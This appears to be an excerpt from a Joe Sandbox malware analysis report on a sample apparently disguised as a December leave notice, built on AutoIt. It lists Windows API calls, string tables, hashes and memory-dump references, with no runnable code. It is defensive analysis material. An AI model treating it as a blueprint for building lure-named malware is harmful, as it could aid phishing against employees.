                                                      • Instruction Fuzzy Hash: 93D09EA556C747B9EC2D67649E1BFB71508F300791FD8894D7603D90C0A8D57D05B931
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FBAD3E), ref: 00FBB124
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: 914512e1c8bb02c9ee99e32fc84bd461291024ff97428e3ca46f40ec7dec23e5
                                                      • Instruction ID: 703aa1d2b864a61011a648030acf3fc587571055d426d462a3cbdb5cf3830b91
                                                      • Opcode Fuzzy Hash: 914512e1c8bb02c9ee99e32fc84bd461291024ff97428e3ca46f40ec7dec23e5
                                                      • Instruction Fuzzy Hash: FBD05E320A460EAEDF028FA4DC02EAE3F6AEB04700F408110FA15C5090C676D531AB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: 13501386d8f91204b3161feb76cfd4ebc2dfb636f142d7fa007677a5238125db
                                                      • Instruction ID: e1ec35d003909116a4b83f4cc6546c046dd6a53089d64bf6d7487a313c30aea8
                                                      • Opcode Fuzzy Hash: 13501386d8f91204b3161feb76cfd4ebc2dfb636f142d7fa007677a5238125db
                                                      • Instruction Fuzzy Hash: 45C04CF240014DDFD752CBC0C944AEEB7BCAB04301F104091A249F1110D7749B459B72
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FA818F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 1e2805994732087e863d51a9c34203be0038d97dcbb17237d91f00620f7080e8
                                                      • Instruction ID: f052f516f995d771f7912fa22928e59b650c7df0b1a756c4d594af3b80940990
                                                      • Opcode Fuzzy Hash: 1e2805994732087e863d51a9c34203be0038d97dcbb17237d91f00620f7080e8
                                                      • Instruction Fuzzy Hash: C3A0113000020CAB8F022BC2E8088883F2CEA002A0B008020F80C000208B23A820ABA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0912f314eef05dba9295e5a71654bc0e0230a667f1f74176c64b07ba220a69d6
                                                      • Instruction ID: ff4d7e11292bed5a005ddf0e06c46af2b637e8565246ceb4657e4acde0ffd917
                                                      • Opcode Fuzzy Hash: 0912f314eef05dba9295e5a71654bc0e0230a667f1f74176c64b07ba220a69d6
                                                      • Instruction Fuzzy Hash: 4222AE75E0420A8FDB24EF58C840BFEB7B0FF14324F188069D95A9B351E335A945EB91
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fee0df926fc458aab54371e4216626e56400b0d2d347ce7a1acfffc71e856c0e
                                                      • Instruction ID: 8599ab952f0d6fad9b7e86e16c9d48f3da46be95d39685dc2c7918776ee5fdcb
                                                      • Opcode Fuzzy Hash: fee0df926fc458aab54371e4216626e56400b0d2d347ce7a1acfffc71e856c0e
                                                      • Instruction Fuzzy Hash: 8C127B71A00609EBDF14EFA5D981AFEB7F5FF48300F148529E406E7254EB3AA911EB50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3728558374-0
                                                      • Opcode ID: 8871f9e326169ec353590474ba004eab5a1fd5a53a71e6434e8a8d43e289bd01
                                                      • Instruction ID: a28021a63846f3cbbe4764ddd69456e04477c0cffa0aa4c042876758df6eb54e
                                                      • Opcode Fuzzy Hash: 8871f9e326169ec353590474ba004eab5a1fd5a53a71e6434e8a8d43e289bd01
                                                      • Instruction Fuzzy Hash: F902C270E00109DBDF14EF68D981ABEB7B5FF44300F108069E906DB2A5EB39DA15EB91
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                      • Instruction ID: bfdd82a7adc6a3fb6fbe6e00431a5e765c0ae511e47c05629c5703e3f2a3a7f4
                                                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                      • Instruction Fuzzy Hash: 94C1C772A051930AEF2D8639D43453EFAA15EA37B531A076DD8B3CB5D5EF20C528F620
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                      • Instruction ID: 1a67cf590437780ae97bf5a189d0eb6a6db837c2e150f7808c5577c6ef0bf09f
                                                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                      • Instruction Fuzzy Hash: B1C1B073A051930AEF2D463AD43453EBBA15EA3BB131A076DD4B3CB5D5EF20D528E620
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction ID: 4a642c2833aa2ce3f3272ee3ad15351213553298f9aad0fe6bc2c6c4c67ec36e
                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction Fuzzy Hash: CEC19232A0909309FF6D463AC47453EBBA15AA2BB531A077DD4B3CB5D5EF20C56CE620
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00FDA2FE
                                                      • DeleteObject.GDI32(00000000), ref: 00FDA310
                                                      • DestroyWindow.USER32 ref: 00FDA31E
                                                      • GetDesktopWindow.USER32 ref: 00FDA338
                                                      • GetWindowRect.USER32(00000000), ref: 00FDA33F
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00FDA480
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00FDA490
                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA4D8
                                                      • GetClientRect.USER32(00000000,?), ref: 00FDA4E4
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FDA51E
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA540
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA553
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA55E
                                                      • GlobalLock.KERNEL32(00000000), ref: 00FDA567
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA576
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FDA57F
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA586
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FDA591
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA5A3
                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0100D9BC,00000000), ref: 00FDA5B9
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FDA5C9
                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00FDA5EF
                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00FDA60E
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA630
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FDA81D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: 9dbad7030394233035a608cafcfd1c8609714bd61be9696557c9bb4b50aa223e
                                                      • Instruction ID: 9c7fd03e7c33a1bd37017e771297e638c36d9a40c18b5c084764bda916ad209e
                                                      • Opcode Fuzzy Hash: 9dbad7030394233035a608cafcfd1c8609714bd61be9696557c9bb4b50aa223e
                                                      • Instruction Fuzzy Hash: 95029F75A00204EFDB25DFA4CD89EAE7BBAFF48310F048119F915AB294C779AD41DB60
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 00FED2DB
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FED30C
                                                      • GetSysColor.USER32(0000000F), ref: 00FED318
                                                      • SetBkColor.GDI32(?,000000FF), ref: 00FED332
                                                      • SelectObject.GDI32(?,00000000), ref: 00FED341
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00FED36C
                                                      • GetSysColor.USER32(00000010), ref: 00FED374
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00FED37B
                                                      • FrameRect.USER32(?,?,00000000), ref: 00FED38A
                                                      • DeleteObject.GDI32(00000000), ref: 00FED391
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00FED3DC
                                                      • FillRect.USER32(?,?,00000000), ref: 00FED40E
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FED439
                                                        • Part of subcall function 00FED575: GetSysColor.USER32(00000012), ref: 00FED5AE
                                                        • Part of subcall function 00FED575: SetTextColor.GDI32(?,?), ref: 00FED5B2
                                                        • Part of subcall function 00FED575: GetSysColorBrush.USER32(0000000F), ref: 00FED5C8
                                                        • Part of subcall function 00FED575: GetSysColor.USER32(0000000F), ref: 00FED5D3
                                                        • Part of subcall function 00FED575: GetSysColor.USER32(00000011), ref: 00FED5F0
                                                        • Part of subcall function 00FED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FED5FE
                                                        • Part of subcall function 00FED575: SelectObject.GDI32(?,00000000), ref: 00FED60F
                                                        • Part of subcall function 00FED575: SetBkColor.GDI32(?,00000000), ref: 00FED618
                                                        • Part of subcall function 00FED575: SelectObject.GDI32(?,?), ref: 00FED625
                                                        • Part of subcall function 00FED575: InflateRect.USER32(?,000000FF,000000FF), ref: 00FED644
                                                        • Part of subcall function 00FED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FED65B
                                                        • Part of subcall function 00FED575: GetWindowLongW.USER32(00000000,000000F0), ref: 00FED670
                                                        • Part of subcall function 00FED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FED698
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 3521893082-0
                                                      • Opcode ID: 084d06e621b8283cda9e4f336d4fba88522760c0e754ae424541de1f12142da2
                                                      • Instruction ID: ee9f908f6eea1ec646993af372cc6f20dd513513c2fcb20e32c184b3ff6d5bce
                                                      • Opcode Fuzzy Hash: 084d06e621b8283cda9e4f336d4fba88522760c0e754ae424541de1f12142da2
                                                      • Instruction Fuzzy Hash: 3291B172408301BFCB21DFA4DC08E6B7BA9FF89325F100A19F9A2961D4D776D944DB62
                                                      APIs
                                                      • DestroyWindow.USER32 ref: 00F9B98B
                                                      • DeleteObject.GDI32(00000000), ref: 00F9B9CD
                                                      • DeleteObject.GDI32(00000000), ref: 00F9B9D8
                                                      • DestroyIcon.USER32(00000000), ref: 00F9B9E3
                                                      • DestroyWindow.USER32(00000000), ref: 00F9B9EE
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FFD2AA
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FFD2E3
                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00FFD711
                                                        • Part of subcall function 00F9B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F9B759,?,00000000,?,?,?,?,00F9B72B,00000000,?), ref: 00F9BA58
                                                      • SendMessageW.USER32 ref: 00FFD758
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FFD76F
                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00FFD785
                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00FFD790
                                                      Similarity
                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 464785882-4108050209
                                                      • Opcode ID: 134c4eb1b01e3aab7339ebf8aeb134aad288ab074e0589a76c811b6618e0a7e9
                                                      • Instruction ID: 76bb98fa974f25ca6e61b4c6a96108ba356e298ab795a2593d5a857f9d9f3c28
                                                      • Opcode Fuzzy Hash: 134c4eb1b01e3aab7339ebf8aeb134aad288ab074e0589a76c811b6618e0a7e9
                                                      • Instruction Fuzzy Hash: 5B12CE31604205DFDB25CF68D988BB9B7E6FF08314F184569EA89CB262C735EC41EB91
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00FCDBD6
                                                      • GetDriveTypeW.KERNEL32(?,0101DC54,?,\\.\,0101DC00), ref: 00FCDCC3
                                                      • SetErrorMode.KERNEL32(00000000,0101DC54,?,\\.\,0101DC00), ref: 00FCDE29
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 3bf94579968c5785ffd82e5e31e095b5d0f2fb7d631b2f3ace2dd838732a1975
                                                      • Instruction ID: 43d2166db6d1282a719286f624275b8abcb9f8a60f5a7c9b9f4d2858020d1dc9
                                                      • Opcode Fuzzy Hash: 3bf94579968c5785ffd82e5e31e095b5d0f2fb7d631b2f3ace2dd838732a1975
                                                      • Instruction Fuzzy Hash: 70519A31A08303ABC614EB25CED3F6DB7A8FB94715B20486EF1879F251CA64D845FB42
                                                      APIs
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-86951937
                                                      • Opcode ID: 8f181fb586276e7544e99f7cc4bceefeffb26b3a8e5429a79efc6bae9a0e98f2
                                                      • Instruction ID: a7d46b95badd055a2a6378d2b1e21ecabffab4149fcdb3fc7416a207e47c08bd
                                                      • Opcode Fuzzy Hash: 8f181fb586276e7544e99f7cc4bceefeffb26b3a8e5429a79efc6bae9a0e98f2
                                                      • Instruction Fuzzy Hash: 22810772A40209ABDB10BB64DD83FFF3768AF15310F044029F945AA196EB78D901F3E1
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00FEC788
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00FEC83E
                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00FEC859
                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00FECB15
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: 0
                                                      • API String ID: 2326795674-4108050209
                                                      • Opcode ID: 2e64881f4cd30e966166df1f3537e9b5d66bd301303a2f4ecc6e249ce133de8a
                                                      • Instruction ID: 374fb35e4e2cefd766ea55612773936ab63aba259e2654ce1f7c54e58b574ca0
                                                      • Opcode Fuzzy Hash: 2e64881f4cd30e966166df1f3537e9b5d66bd301303a2f4ecc6e249ce133de8a
                                                      • Instruction Fuzzy Hash: 69F12671504380AFD7218F6ACC85BAABBE4FF89724F04052DF588D6291C779D942EBE1
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,0101DC00), ref: 00FE6449
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 3964851224-45149045
                                                      • Opcode ID: 65f4877afb12fdde54d1af716b839c54c0004775771f2ca99e32aa2757478d50
                                                      • Instruction ID: 0a6d99a3c8b54324fc02ec31138629ad8418a2da42a97343c6556eb756f24cfb
                                                      • Opcode Fuzzy Hash: 65f4877afb12fdde54d1af716b839c54c0004775771f2ca99e32aa2757478d50
                                                      • Instruction Fuzzy Hash: 2AC186306043898BDA04EF11C951AAE7796BFA4394F044859F895DB3D2DF34ED4AEB82
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 00FED5AE
                                                      • SetTextColor.GDI32(?,?), ref: 00FED5B2
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FED5C8
                                                      • GetSysColor.USER32(0000000F), ref: 00FED5D3
                                                      • CreateSolidBrush.GDI32(?), ref: 00FED5D8
                                                      • GetSysColor.USER32(00000011), ref: 00FED5F0
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FED5FE
                                                      • SelectObject.GDI32(?,00000000), ref: 00FED60F
                                                      • SetBkColor.GDI32(?,00000000), ref: 00FED618
                                                      • SelectObject.GDI32(?,?), ref: 00FED625
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00FED644
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FED65B
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FED670
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FED698
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00FED6BF
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00FED6DD
                                                      • DrawFocusRect.USER32(?,?), ref: 00FED6E8
                                                      • GetSysColor.USER32(00000011), ref: 00FED6F6
                                                      • SetTextColor.GDI32(?,00000000), ref: 00FED6FE
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00FED712
                                                      • SelectObject.GDI32(?,00FED2A5), ref: 00FED729
                                                      • DeleteObject.GDI32(?), ref: 00FED734
                                                      • SelectObject.GDI32(?,?), ref: 00FED73A
                                                      • DeleteObject.GDI32(?), ref: 00FED73F
                                                      • SetTextColor.GDI32(?,?), ref: 00FED745
                                                      • SetBkColor.GDI32(?,?), ref: 00FED74F
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: e123debffe8e4f45f6f38e4b9e68d6a6eeafc6b1a4a2f02595e839b3a28427c7
                                                      • Instruction ID: 9572794fe7f98c490ee3c527588b202ec5c0fa1b27c94817c1a0f7d62bbd7c2e
                                                      • Opcode Fuzzy Hash: e123debffe8e4f45f6f38e4b9e68d6a6eeafc6b1a4a2f02595e839b3a28427c7
                                                      • Instruction Fuzzy Hash: E9514A72900208BFDF219FE9DC48AEE7B79FF08324F104515FA55AB291D7769A40DB60
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00FEB7B0
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FEB7C1
                                                      • CharNextW.USER32(0000014E), ref: 00FEB7F0
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00FEB831
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00FEB847
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FEB858
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00FEB875
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00FEB8C7
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00FEB8DD
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FEB90E
                                                      • _memset.LIBCMT ref: 00FEB933
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00FEB97C
                                                      • _memset.LIBCMT ref: 00FEB9DB
                                                      • SendMessageW.USER32 ref: 00FEBA05
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00FEBA5D
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00FEBB0A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00FEBB2C
                                                      • GetMenuItemInfoW.USER32(?), ref: 00FEBB76
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FEBBA3
                                                      • DrawMenuBar.USER32(?), ref: 00FEBBB2
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00FEBBDA
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
